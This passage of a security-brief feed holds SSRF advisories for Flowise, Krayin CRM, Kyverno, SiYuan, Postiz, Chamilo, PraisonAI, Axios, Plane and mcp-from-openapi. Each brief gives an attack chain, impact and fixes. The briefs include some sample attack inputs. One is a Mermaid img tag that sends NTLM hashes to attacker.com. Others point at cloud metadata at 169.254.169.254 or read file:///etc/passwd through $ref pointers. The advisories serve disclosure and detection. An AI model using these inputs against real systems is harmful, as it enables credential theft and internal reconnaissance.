<li>Apply the necessary patches to Flowise to remediate the SSRF vulnerability as described in GHSA-xhmj-rg95-44hv.</li>
<li>Deploy the following Sigma rule to detect exploitation attempts involving the <code>http</code> module targeting common cloud metadata endpoints: <code>Flowise SSRF Using HTTP Module</code>.</li>
<li>Enable logging of HTTP requests originating from the Flowise server to aid in identifying and investigating potential SSRF attacks.</li>
<li>Review and harden network segmentation to limit the impact of potential SSRF vulnerabilities.</li>
<li>Consider disabling the custom function feature if it is not essential to the functionality of the Flowise deployment.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>ssrf</category><category>flowise</category><category>cloud</category></item><item><title>Webkul Krayin CRM SSRF Vulnerability (CVE-2026-38527)</title><link>https://feed.craftedsignal.io/briefs/2026-04-krayin-crm-ssrf/</link><pubDate>Wed, 15 Apr 2026 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-krayin-crm-ssrf/</guid><description>A Server-Side Request Forgery (SSRF) vulnerability in Webkul Krayin CRM v2.2.x allows attackers to scan internal resources by sending a crafted POST request to the /settings/webhooks/create endpoint.</description><content:encoded><![CDATA[<p>CVE-2026-38527 details a Server-Side Request Forgery (SSRF) vulnerability affecting Webkul Krayin CRM version 2.2.x. The vulnerability is located in the <code>/settings/webhooks/create</code> component. An attacker can exploit this flaw by crafting a malicious POST request that forces the server to make requests to internal resources. This can be leveraged to scan internal network infrastructure, potentially revealing sensitive information or accessing internal services that are not meant to be exposed to the outside world. The vulnerability was published on April 14, 2026. Exploitation requires the attacker to be able to send POST requests to the affected endpoint.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker identifies a Webkul Krayin CRM instance running version 2.2.x.</li>
<li>The attacker crafts a POST request targeting the <code>/settings/webhooks/create</code> endpoint.</li>
<li>The POST request includes a malicious payload in the body, designed to trigger an SSRF vulnerability. This payload could involve specifying a URL for the webhook to call back to.</li>
<li>The vulnerable server processes the crafted POST request and attempts to create a new webhook.</li>
<li>The server-side component incorrectly handles or sanitizes the URL provided for the webhook callback.</li>
<li>As part of the webhook creation process, the server initiates an HTTP request to the attacker-controlled URL or internal resource specified in the crafted POST request.</li>
<li>The server successfully connects to the specified resource, potentially revealing information about the internal network or services.</li>
<li>The attacker analyzes the response from the internal service or server to gather sensitive information, such as internal hostnames, open ports, or service versions.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this SSRF vulnerability (CVE-2026-38527) can allow an attacker to enumerate internal network resources, potentially identifying sensitive services and systems. This information can be used to further compromise the target environment, potentially leading to data breaches or system compromise. While the specific number of affected organizations is unknown, any organization using a vulnerable version of Webkul Krayin CRM is at risk.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Apply the necessary patch or upgrade to a version of Webkul Krayin CRM that resolves CVE-2026-38527.</li>
<li>Implement strict input validation and sanitization on all user-supplied data, especially URLs, to prevent SSRF attacks.</li>
<li>Monitor web server logs for suspicious requests to the <code>/settings/webhooks/create</code> endpoint, looking for unusual URLs or request patterns, using the provided Sigma rule.</li>
<li>Implement network segmentation to limit the impact of potential SSRF attacks by restricting access to sensitive internal resources.</li>
<li>Deploy the Sigma rules in this brief to your SIEM and tune for your environment.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>cve-2026-38527</category><category>ssrf</category><category>webkul</category><category>krayin-crm</category></item><item><title>Kyverno SSRF Vulnerability in CEL HTTP Library</title><link>https://feed.craftedsignal.io/briefs/2024-01-08-kyverno-ssrf/</link><pubDate>Tue, 14 Apr 2026 22:37:20 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-08-kyverno-ssrf/</guid><description>A Server-Side Request Forgery (SSRF) vulnerability in Kyverno's CEL HTTP library allows users with namespace-scoped policy creation permissions to make arbitrary HTTP requests, enabling unauthorized access to internal services, cloud metadata endpoints, and data exfiltration.</description><content:encoded><![CDATA[<p>A Server-Side Request Forgery (SSRF) vulnerability has been identified in Kyverno&rsquo;s CEL HTTP library (<code>pkg/cel/libs/http/</code>), affecting versions &gt;= 1.16.0. This flaw allows users with permissions to create namespace-scoped policies to bypass intended restrictions and make arbitrary HTTP requests from the Kyverno admission controller. This can lead to unauthorized access to internal Kubernetes services in other namespaces, cloud metadata endpoints such as 169.254.169.254 (allowing credential theft), and the exfiltration of sensitive data by embedding it in policy error messages. The vulnerability stems from a lack of URL validation in the <code>http.Get()</code> and <code>http.Post()</code> functions used within CEL policies, contrasting with the namespace enforcement present in the <code>resource.Lib</code>. The reported vulnerability was tested and confirmed on Kyverno v1.16.2 deployed via Helm chart 3.6.2.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker gains the ability to create NamespacedValidatingPolicy resources within a specific Kubernetes namespace. This could be achieved through compromised credentials, misconfigured RBAC, or other privilege escalation methods.</li>
<li>The attacker crafts a malicious NamespacedValidatingPolicy that utilizes the <code>http.Get()</code> or <code>http.Post()</code> function within a CEL expression. The crafted policy is applied to the target Kubernetes cluster.</li>
<li>The CEL expression within the policy is designed to make an HTTP request to an internal service (e.g., <code>internal-api.kube-system.svc.cluster.local</code>) or a cloud metadata endpoint (<code>169.254.169.254</code>).</li>
<li>The crafted NamespacedValidatingPolicy is triggered by a specific event, such as the creation of a ConfigMap within the attacker&rsquo;s namespace, which matches the <code>matchConstraints</code> defined in the policy.</li>
<li>The Kyverno admission controller executes the CEL expression, making the HTTP request to the specified internal service or cloud metadata endpoint.</li>
<li>The HTTP response from the internal service or cloud metadata endpoint is captured by the CEL expression.</li>
<li>The attacker crafts a <code>messageExpression</code> within the NamespacedValidatingPolicy to include the captured data in a validation error message.</li>
<li>The validation error message, containing the exfiltrated data, is returned to the user, effectively leaking sensitive information.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>This SSRF vulnerability allows attackers with limited, namespace-scoped privileges to access sensitive data within a Kubernetes cluster. This includes the ability to access services in other namespaces, potentially compromising sensitive configurations or secrets. Access to cloud metadata endpoints (169.254.169.254) allows the theft of IAM credentials, leading to further escalation of privileges within the cloud environment. Successful exploitation breaks namespace isolation, undermining the security model of Kyverno and Kubernetes.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule to detect suspicious usage of <code>http.Get</code> or <code>http.Post</code> function in <code>NamespacedValidatingPolicy</code> resources in your SIEM and tune for your environment.</li>
<li>Monitor network connections originating from the Kyverno pods, specifically looking for connections to internal Kubernetes services or cloud metadata endpoints (169.254.169.254), using the <code>network_connection</code> log source.</li>
<li>Apply the suggested fix by adding namespace and URL restrictions to <code>pkg/cel/libs/http/http.go</code> in Kyverno, similar to how <code>resource.Lib</code> enforces namespace boundaries as per the advisory.</li>
<li>Upgrade Kyverno to a patched version &gt;= 1.17 when available, addressing the CVE-2026-4789.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>SSRF</category><category>kyverno</category><category>kubernetes</category><category>cel</category><category>cloud-security</category></item><item><title>SiYuan Zero-Click NTLM Theft and Blind SSRF via Mermaid Diagrams</title><link>https://feed.craftedsignal.io/briefs/2026-04-siyuan-ntlm-ssrf/</link><pubDate>Sat, 11 Apr 2026 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-siyuan-ntlm-ssrf/</guid><description>SiYuan is vulnerable to zero-click NTLM hash theft on Windows and blind SSRF on all platforms due to insecure Mermaid.js configuration, where a malicious Mermaid diagram containing a protocol-relative URL can be injected into a note, causing the Electron client to fetch the URL, triggering SMB authentication on Windows and sending the victim's NTLMv2 hash to the attacker. On macOS and Linux, the request acts as a tracking pixel and blind SSRF.</description><content:encoded><![CDATA[<p>SiYuan, a note-taking application, is vulnerable to a zero-click NTLM hash theft and blind SSRF exploit due to insecure configuration of Mermaid.js. The application configures Mermaid.js with <code>securityLevel: &quot;loose&quot;</code> and <code>htmlLabels: true</code>, which allows <code>&lt;img&gt;</code> tags with <code>src</code> attributes to bypass sanitization and be injected into SVG <code>&lt;foreignObject&gt;</code> blocks. When a user opens a note containing a malicious Mermaid diagram with a protocol-relative URL (e.g., <code>//attacker.com/image.png</code>), the Electron client fetches the URL. On Windows, this resolves as a UNC path, triggering SMB authentication and sending the victim&rsquo;s NTLMv2 hash to the attacker. On macOS and Linux, the same diagram triggers an HTTP request to the attacker&rsquo;s server, exfiltrating the victim&rsquo;s IP address. The vulnerability affects SiYuan versions prior to the fix implemented after April 7, 2026. This allows for credential theft without any user interaction beyond opening a note.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker crafts a malicious SiYuan note containing a Mermaid diagram with a protocol-relative URL within an <code>&lt;img&gt;</code> tag, such as <code>&lt;img src='//attacker.com/share/img.png'&gt;</code>.</li>
<li>The attacker distributes the malicious note (e.g., via sharing or a crafted .sy export).</li>
<li>The victim opens the note in SiYuan.</li>
<li>SiYuan renders the Mermaid diagram using the insecure Mermaid.js configuration.</li>
<li>The SVG containing the malicious <code>&lt;img&gt;</code> tag is injected into the DOM via <code>innerHTML</code>.</li>
<li>The Electron client attempts to fetch the resource at the protocol-relative URL.</li>
<li>On Windows, the protocol-relative URL resolves to a UNC path (<code>\\attacker.com\share\img.png</code>), initiating an SMB connection.</li>
<li>Windows automatically sends the victim&rsquo;s NTLMv2 hash to the attacker&rsquo;s SMB server, or makes an HTTP request leaking victim&rsquo;s IP on other platforms.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>The vulnerability allows for zero-click NTLMv2 hash theft on Windows systems, where the victim only needs to open a note containing the malicious Mermaid diagram. The stolen NTLMv2 hashes can be cracked offline or used in relay attacks to gain unauthorized access to the victim&rsquo;s resources. On all platforms, this vulnerability can be exploited to perform blind SSRF and leak the victim&rsquo;s IP address, acting as a tracking pixel to confirm when the note was opened. This affects all SiYuan users who receive a crafted note.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule <code>Detect SiYuan Mermaid NTLM Theft Attempt</code> to identify SMB traffic originating from SiYuan processes attempting to connect to external IPs (network_connection log source).</li>
<li>Deploy the Sigma rule <code>Detect SiYuan Mermaid SSRF Attempt</code> to detect HTTP requests from SiYuan to external IP addresses with a suspicious URL (network_connection log source).</li>
<li>Monitor network traffic for SMB connections originating from SiYuan, especially to unusual or external destinations (network_connection log source).</li>
<li>Block the attacker&rsquo;s domain (<code>attacker.com</code>) at the DNS resolver, as observed in the malicious Mermaid diagram example (iocs).</li>
<li>Upgrade SiYuan to a patched version that addresses CVE-2026-40107 to mitigate the underlying vulnerability.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>siyuan</category><category>ntlm</category><category>ssrf</category><category>credential-theft</category><category>mermaid</category></item><item><title>Postiz SSRF Vulnerability (CVE-2026-40168)</title><link>https://feed.craftedsignal.io/briefs/2026-04-postiz-ssrf/</link><pubDate>Sat, 11 Apr 2026 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-postiz-ssrf/</guid><description>Postiz, an AI social media scheduling tool, is vulnerable to Server-Side Request Forgery (SSRF) in versions prior to 2.21.5, allowing attackers to access internal resources.</description><content:encoded><![CDATA[<p>Postiz is an AI-powered social media scheduling tool. Versions prior to 2.21.5 are susceptible to a Server-Side Request Forgery (SSRF) vulnerability, identified as CVE-2026-40168. The vulnerability exists in the <code>/api/public/stream</code> endpoint. The application validates the initially supplied URL and blocks direct access to private or internal hosts. However, it fails to re-validate the final destination after HTTP redirects. This flaw enables an attacker to bypass the initial validation by providing a public HTTPS URL that redirects to an internal resource. Successful exploitation can lead to information disclosure, internal service enumeration, and potentially further compromise of the Postiz infrastructure. The vulnerability was reported and patched in version 2.21.5.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker identifies the vulnerable <code>/api/public/stream</code> endpoint in Postiz.</li>
<li>The attacker crafts a malicious URL. This URL is a valid, publicly accessible HTTPS URL.</li>
<li>The malicious URL is designed to redirect the request to an internal resource (e.g., <code>http://127.0.0.1:8080/</code>).</li>
<li>The attacker submits the crafted URL to the <code>/api/public/stream</code> endpoint.</li>
<li>Postiz server-side application validates the initial URL, which passes because it&rsquo;s a public HTTPS address.</li>
<li>The Postiz server-side application follows the HTTP redirect from the attacker-controlled URL.</li>
<li>The request is redirected to the internal resource (e.g., <code>http://127.0.0.1:8080/</code>).</li>
<li>The Postiz server makes a request to the internal resource, potentially revealing sensitive information or enabling further exploitation.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-40168 allows an attacker to perform Server-Side Request Forgery (SSRF) attacks against the Postiz application. This can lead to the exposure of sensitive internal resources, such as configuration files, internal APIs, or databases. An attacker might be able to enumerate internal services, read sensitive data, or even perform actions on behalf of the Postiz server. The severity of the impact depends on the nature of the accessible internal resources and could range from information disclosure to remote code execution.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade Postiz to version 2.21.5 or later to patch CVE-2026-40168 as referenced in the Postiz release notes.</li>
<li>Implement strict URL validation and sanitization on the <code>/api/public/stream</code> endpoint. Ensure that validation occurs both before and after any HTTP redirects.</li>
<li>Deploy the Sigma rule to detect suspicious requests to the <code>/api/public/stream</code> endpoint that may indicate SSRF attempts.</li>
<li>Monitor web server logs for unusual HTTP requests originating from the Postiz server to internal IP addresses or private network ranges.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>ssrf</category><category>cve-2026-40168</category><category>postiz</category></item><item><title>Chamilo LMS SSRF Vulnerability in Social Wall Feature</title><link>https://feed.craftedsignal.io/briefs/2026-04-chamilo-ssrf/</link><pubDate>Sat, 11 Apr 2026 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-chamilo-ssrf/</guid><description>A Server-Side Request Forgery (SSRF) vulnerability exists in Chamilo LMS versions prior to 1.11.38 and 2.0.0-RC.3, allowing authenticated attackers to make arbitrary HTTP requests, scan internal ports, and access cloud instance metadata via the Social Wall feature.</description><content:encoded><![CDATA[<p>Chamilo LMS, a learning management system, is vulnerable to Server-Side Request Forgery (SSRF) in versions prior to 1.11.38 and 2.0.0-RC.3. This vulnerability resides in the Social Wall feature, specifically the <code>read_url_with_open_graph</code> endpoint. By supplying a crafted URL via the <code>social_wall_new_msg_main</code> POST parameter, an authenticated attacker can force the Chamilo LMS server to make arbitrary HTTP requests. This SSRF can be leveraged to probe internal services, perform port scanning on the internal network, and potentially access sensitive cloud instance metadata. The vulnerability was patched in versions 1.11.38 and 2.0.0-RC.3. Defenders should prioritize patching and monitoring for suspicious outbound HTTP requests originating from the Chamilo LMS server.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker authenticates to the Chamilo LMS platform with valid user credentials.</li>
<li>The attacker crafts a malicious URL targeting an internal service or resource.</li>
<li>The attacker initiates a POST request to the <code>read_url_with_open_graph</code> endpoint.</li>
<li>The POST request includes the crafted URL within the <code>social_wall_new_msg_main</code> parameter.</li>
<li>The Chamilo LMS server, without proper validation, processes the POST request.</li>
<li>The server then makes an HTTP request to the attacker-supplied URL.</li>
<li>If the URL targets an internal service, the attacker may gain unauthorized access or information.</li>
<li>Successful exploitation allows the attacker to scan internal ports and potentially access cloud instance metadata, leading to further reconnaissance or lateral movement.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this SSRF vulnerability could allow an attacker to gain unauthorized access to internal services and data within the organization&rsquo;s network. An attacker could use this vulnerability to enumerate internal systems, gather sensitive information, and potentially escalate privileges within the network. This could also lead to lateral movement, data exfiltration, or other malicious activities. The severity of the impact depends on the sensitivity of the internal services exposed and the attacker&rsquo;s objectives.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade Chamilo LMS to version 1.11.38 or 2.0.0-RC.3 or later to patch CVE-2026-31941.</li>
<li>Implement network segmentation to limit the impact of potential SSRF attacks.</li>
<li>Monitor web server logs for POST requests to <code>/main/social/social_wall/social_wall.ajax.php</code> with unusual URLs in the <code>social_wall_new_msg_main</code> parameter to detect potential exploitation attempts.</li>
<li>Deploy the Sigma rule to detect requests with unusual URLs to <code>social_wall.ajax.php</code>.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>chamilo</category><category>ssrf</category><category>cve-2026-31941</category><category>lms</category></item><item><title>PraisonAI SSRF Vulnerability via Unvalidated Webhook URL</title><link>https://feed.craftedsignal.io/briefs/2024-01-praisonai-ssrf/</link><pubDate>Thu, 09 Apr 2026 22:16:35 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-praisonai-ssrf/</guid><description>PraisonAI versions prior to 4.5.128 are vulnerable to Server-Side Request Forgery (SSRF) due to a lack of URL validation on the webhook_url parameter in the /api/v1/runs endpoint, allowing unauthenticated attackers to send arbitrary POST requests from the server.</description><content:encoded><![CDATA[<p>PraisonAI, a multi-agent teams system, is susceptible to a Server-Side Request Forgery (SSRF) vulnerability affecting versions prior to 4.5.128. The vulnerability resides in the <code>/api/v1/runs</code> endpoint, which accepts a <code>webhook_url</code> parameter in the request body without proper validation. This allows an unauthenticated attacker to specify an arbitrary URL, causing the PraisonAI server to send an HTTP POST request to that URL upon job completion. This flaw enables attackers to target internal services, cloud metadata endpoints, and other network-adjacent resources, potentially leading to information disclosure, privilege escalation, or denial-of-service. Organizations using affected versions of PraisonAI should upgrade to version 4.5.128 or later to mitigate this risk.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An unauthenticated attacker identifies a PraisonAI instance running a version prior to 4.5.128.</li>
<li>The attacker crafts a malicious HTTP POST request to the <code>/api/v1/runs</code> endpoint.</li>
<li>The crafted request includes a <code>webhook_url</code> parameter containing a URL pointing to an internal service, cloud metadata endpoint, or external attacker-controlled server.</li>
<li>The PraisonAI server receives the request and queues a job.</li>
<li>The job completes (either successfully or with an error).</li>
<li>Upon completion, the server, using <code>httpx.AsyncClient</code>, initiates an HTTP POST request to the URL specified in the <code>webhook_url</code> parameter.</li>
<li>If the <code>webhook_url</code> points to an internal service, the attacker can potentially access sensitive information or trigger actions within that service.</li>
<li>If the <code>webhook_url</code> points to a cloud metadata endpoint, the attacker can retrieve cloud credentials or configuration details.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this SSRF vulnerability allows an unauthenticated attacker to force the PraisonAI server to make arbitrary HTTP POST requests. This can lead to the exposure of sensitive information from internal services or cloud metadata, potentially granting the attacker unauthorized access to systems and data. The vulnerability could also be leveraged to perform denial-of-service attacks against internal resources. While the exact number of affected organizations is unknown, any organization running a vulnerable version of PraisonAI is at risk.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade PraisonAI instances to version 4.5.128 or later to remediate CVE-2026-40114.</li>
<li>Inspect web server logs for requests to the <code>/api/v1/runs</code> endpoint containing suspicious <code>webhook_url</code> parameters to detect potential exploitation attempts. Deploy the Sigma rule to detect suspicious webhook URLs.</li>
<li>Monitor network traffic for unexpected outbound connections originating from the PraisonAI server to internal or external destinations, as this could indicate SSRF exploitation.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>ssrf</category><category>praisonai</category><category>cve-2026-40114</category><category>web-application</category></item><item><title>Axios NO_PROXY Hostname Normalization Bypass Leads to SSRF</title><link>https://feed.craftedsignal.io/briefs/2024-01-axios-ssrf/</link><pubDate>Thu, 09 Apr 2026 17:32:19 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-axios-ssrf/</guid><description>Axios is vulnerable to a NO_PROXY hostname normalization bypass leading to SSRF, where requests to loopback addresses like `localhost.` or `[::1]` bypass `NO_PROXY` rules, allowing attackers to force requests through a proxy and potentially exfiltrate sensitive data.</description><content:encoded><![CDATA[<p>Axios, a popular HTTP client for Node.js, is susceptible to a NO_PROXY bypass vulnerability due to incorrect hostname normalization. This flaw, confirmed in version 1.12.2 and affecting all versions prior to 1.15.0, arises from the application&rsquo;s failure to properly handle hostnames with trailing dots (e.g., <code>localhost.</code>) or IPv6 literals (e.g., <code>[::1]</code>) when evaluating <code>NO_PROXY</code> rules.  Instead of performing normalization as recommended by RFC standards, Axios conducts literal string comparisons. This oversight allows attackers to circumvent intended <code>NO_PROXY</code> configurations and force requests through an attacker-controlled proxy, even when loopback or internal services are meant to be protected. The vulnerability could be exploited to bypass SSRF mitigations, potentially enabling exfiltration of sensitive information.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker identifies an application using a vulnerable version of Axios and relies on <code>NO_PROXY</code> for loopback protection.</li>
<li>The attacker crafts a malicious URL targeting a loopback address (e.g., <code>http://localhost.:8080/</code> or <code>http://[::1]:8080/</code>).</li>
<li>The vulnerable Axios instance processes the URL without proper hostname normalization.</li>
<li>Due to the lack of normalization, the <code>NO_PROXY</code> check fails to recognize <code>localhost.</code> or <code>[::1]</code> as loopback addresses.</li>
<li>Axios incorrectly routes the request through a configured proxy server, which could be controlled by the attacker.</li>
<li>The attacker-controlled proxy receives the request and can forward it to the intended internal service.</li>
<li>The internal service responds to the proxy.</li>
<li>The attacker-controlled proxy captures the response data, potentially containing sensitive information, and can exfiltrate it.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Applications that depend on <code>NO_PROXY</code> settings to safeguard loopback or internal access are vulnerable to SSRF attacks. Attackers can exploit this flaw to force Axios to send local traffic through an attacker-controlled proxy server. This bypasses SSRF mitigations that rely on <code>NO_PROXY</code> rules, allowing the potential exfiltration of sensitive information from internal services via the compromised proxy.  The number of affected applications is potentially large, given the widespread use of Axios in Node.js environments. Successful exploitation could lead to unauthorized access to sensitive internal resources and data breaches.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade Axios to version 1.15.0 or later to address the vulnerability (CVE-2025-62718).</li>
<li>Deploy the Sigma rule <code>Detect Axios SSRF via NO_PROXY Bypass</code> to identify attempts to exploit this vulnerability.</li>
<li>Inspect web server logs for requests containing loopback addresses with trailing dots or bracketed IPv6 literals to identify potential exploitation attempts.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>ssrf</category><category>no_proxy</category><category>axios</category><category>hostname_normalization</category></item><item><title>Plane Project Management Tool SSRF Vulnerability (CVE-2026-39843)</title><link>https://feed.craftedsignal.io/briefs/2026-04-plane-ssrf/</link><pubDate>Thu, 09 Apr 2026 16:16:31 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-plane-ssrf/</guid><description>Plane project management tool versions before 1.3.0 are vulnerable to Server-Side Request Forgery (SSRF), allowing authenticated low-privilege attackers to read internal resources by exploiting the favicon fetch functionality.</description><content:encoded><![CDATA[<p>Plane is an open-source project management tool. Versions prior to 1.3.0 are vulnerable to a Server-Side Request Forgery (SSRF) vulnerability, tracked as CVE-2026-39843. This vulnerability stems from an incomplete fix for GHSA-jcc6-f9v6-f7jw. An authenticated attacker with low privileges can exploit this vulnerability by supplying a crafted HTML page containing a <code>&lt;link&gt;</code> tag that redirects to a private IP address when using the &ldquo;Add link&rdquo; functionality. The vulnerability exists within the <code>fetch_and_encode_favicon()</code> function, which uses <code>requests.get(favicon_url, ...)</code> and follows redirects by default. This allows the attacker to force the server to make requests to internal resources. The vulnerability is resolved in version 1.3.0.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker authenticates to a Plane instance with low-privilege credentials.</li>
<li>Attacker crafts a malicious HTML page containing a <code>&lt;link&gt;</code> tag in the <code>&lt;head&gt;</code> section. The <code>href</code> attribute of this tag points to a redirect URL.</li>
<li>The redirect URL points to a private IP address or internal service (e.g., <code>http://192.168.1.100/</code>).</li>
<li>The attacker uses the &ldquo;Add link&rdquo; functionality in Plane to add the crafted HTML page&rsquo;s URL to a project or task.</li>
<li>Plane&rsquo;s <code>fetch_and_encode_favicon()</code> function attempts to fetch the favicon from the supplied URL.</li>
<li>Due to the redirect in the malicious HTML page, the server-side request is redirected to the private IP address specified in the <code>href</code> attribute.</li>
<li>The server fetches content from the internal resource.</li>
<li>The attacker can view the response from the internal resource, potentially revealing sensitive information or allowing further exploitation.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this SSRF vulnerability allows an authenticated, low-privilege attacker to read internal resources that the Plane server has access to. This could lead to the exposure of sensitive data, such as configuration files, internal API endpoints, or other confidential information. The number of potential victims is equal to the number of organizations using vulnerable versions of the Plane project management tool. The severity of the impact depends on the sensitivity of the information exposed and the attacker&rsquo;s ability to leverage the exposed information for further attacks.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade Plane to version 1.3.0 or later to patch CVE-2026-39843.</li>
<li>Monitor web server logs for requests originating from the Plane application to internal IP addresses, especially those in the private IP ranges (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16). Use the Sigma rule <code>Detect Plane SSRF via Internal IP Request</code> to identify such requests.</li>
<li>Implement network segmentation and restrict the Plane server&rsquo;s access to only necessary internal resources.</li>
<li>Consider implementing additional input validation and sanitization measures to prevent the injection of malicious URLs.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>ssrf</category><category>cve-2026-39843</category><category>plane</category><category>project-management</category></item><item><title>mcp-from-openapi SSRF Vulnerability via Untrusted OpenAPI Specifications</title><link>https://feed.craftedsignal.io/briefs/2026-04-mcp-from-openapi-ssrf/</link><pubDate>Wed, 08 Apr 2026 19:22:53 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-mcp-from-openapi-ssrf/</guid><description>The mcp-from-openapi library is vulnerable to Server-Side Request Forgery (SSRF) due to insecure handling of $ref pointers in OpenAPI specifications, allowing attackers to read local files, internal network resources, and cloud metadata endpoints by processing untrusted OpenAPI specifications.</description><content:encoded><![CDATA[<p>The <code>mcp-from-openapi</code> library, up to version 2.1.2, is susceptible to Server-Side Request Forgery (SSRF) attacks. This vulnerability arises from the library&rsquo;s use of <code>@apidevtools/json-schema-ref-parser</code> to dereference <code>$ref</code> pointers in OpenAPI specifications without implementing any URL restrictions or custom resolvers. By crafting malicious OpenAPI specifications, an attacker can exploit this flaw to force the library to fetch internal network addresses, cloud metadata endpoints (like <code>http://169.254.169.254/</code>), or local files using <code>file:///etc/passwd</code>. This occurs during the <code>initialize()</code> call when processing the OpenAPI definition. Defenders should be aware that applications utilizing <code>mcp-from-openapi</code> to process potentially untrusted OpenAPI specifications are at risk.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker crafts a malicious OpenAPI specification containing <code>$ref</code> pointers to internal resources, cloud metadata endpoints, or local files.</li>
<li>The application using <code>mcp-from-openapi</code> receives this crafted OpenAPI specification, for example, via user upload or network request.</li>
<li>The <code>OpenAPIToolGenerator.initialize()</code> function is called, triggering the <code>$ref</code> dereferencing process.</li>
<li>The <code>json-schema-ref-parser</code> library, lacking proper configuration, fetches the resources specified in the malicious <code>$ref</code> pointers.</li>
<li>If the <code>$ref</code> points to a cloud metadata endpoint (e.g., <code>http://169.254.169.254/</code>), the server attempts to retrieve sensitive cloud credentials.</li>
<li>If the <code>$ref</code> points to an internal service, the server probes the internal network, potentially revealing information about available services.</li>
<li>If the <code>$ref</code> points to a local file (e.g., <code>file:///etc/passwd</code>), the server reads the contents of the file and includes it in the dereferenced output.</li>
<li>The attacker gains access to sensitive information, such as cloud credentials or internal network configurations, enabling further exploitation or lateral movement.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this SSRF vulnerability in <code>mcp-from-openapi</code> can have significant consequences. Attackers can steal cloud credentials by targeting metadata endpoints like <code>http://169.254.169.254/</code>, allowing them to compromise cloud infrastructure. The vulnerability also enables internal network scanning by probing internal services and ports, mapping out the internal network layout. Furthermore, attackers can read arbitrary files from the server&rsquo;s filesystem using the <code>file://</code> protocol, potentially gaining access to sensitive configuration files or credentials. The affected packages include npm/mcp-from-openapi (vulnerable: &lt;= 2.1.2), npm/@frontmcp/sdk (vulnerable: &lt;= 1.0.3), and npm/@frontmcp/adapters (vulnerable: &lt;= 1.0.3).</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade <code>mcp-from-openapi</code> to a patched version if available, or implement a patch to restrict URL resolution as described in the suggested fix.</li>
<li>Implement input validation on OpenAPI specifications before processing them with <code>mcp-from-openapi</code> to prevent malicious <code>$ref</code> values, mitigating CVE-2026-39885.</li>
<li>Monitor network connections originating from processes running <code>mcp-from-openapi</code>, alerting on connections to internal network addresses or cloud metadata endpoints using the network connection rule below.</li>
<li>Deploy the Sigma rule that detects access to local files via the <code>file://</code> protocol to your SIEM and tune it for your environment.</li>
</ul>
